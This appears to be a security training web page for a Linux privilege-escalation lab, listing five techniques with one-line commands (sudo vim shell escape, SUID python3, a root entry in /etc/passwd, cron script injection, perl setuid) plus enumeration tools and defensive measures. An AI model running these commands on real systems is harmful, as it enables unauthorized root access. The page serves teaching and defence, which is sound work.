🛡️ Authorized Lab Environment All demos run against safe, isolated lab targets. Includes defensive takeaways and security best practices. Educational Only

⬆️ Access Control Audit Lab

Permission Analysis - Linux Lab

5 different methods to escalate privileges on a Linux system

🔧 Sudo Abuse
SUID Binaries
📝 Writable Files
Cron Jobs
🎯 Capabilities
www-data@target:~ — PrivEsc Lab — 120×30 ● PRIVILEGE ESCALATION
🔧
Sudo Misconfiguration
sudo vim -c ':!/bin/bash'
GTFOBins shell escape via allowed sudo commands
SUID Binary
python3 -c 'os.execl("/bin/bash")'
Abuse SUID bit on interpreters
📝
Writable /etc/passwd
echo 'hacker:hash:0:0:::'
Add root user to passwd file
Cron Job Abuse
echo 'payload' >> cron.sh
Inject commands into writable cron scripts
🎯
Linux Capabilities
perl -e 'setuid(0); exec bash'
Exploit CAP_SETUID capability

🛠️ Enumeration Tools

LinPEAS
Comprehensive Linux enumeration
LinEnum
Legacy enumeration script
linux-exploit-suggester
Kernel exploit finder
pspy
Monitor processes without root
GTFOBins
Unix binaries exploitation database
PEASS-ng
Privilege Escalation Awesome Scripts

🛡️ Defense Strategies

Principle of Least Privilege
Only grant necessary permissions
Audit Sudo Rules
Review /etc/sudoers regularly
Remove SUID Bits
chmod u-s unnecessary binaries
File Permissions
Proper ownership on sensitive files
Cron Security
Restrict script permissions to root only
Capability Audit
Review with getcap -r /

Master Linux Privilege Escalation

Learn to identify and exploit misconfigurations to gain root access in CTF and real-world scenarios

Start Learning →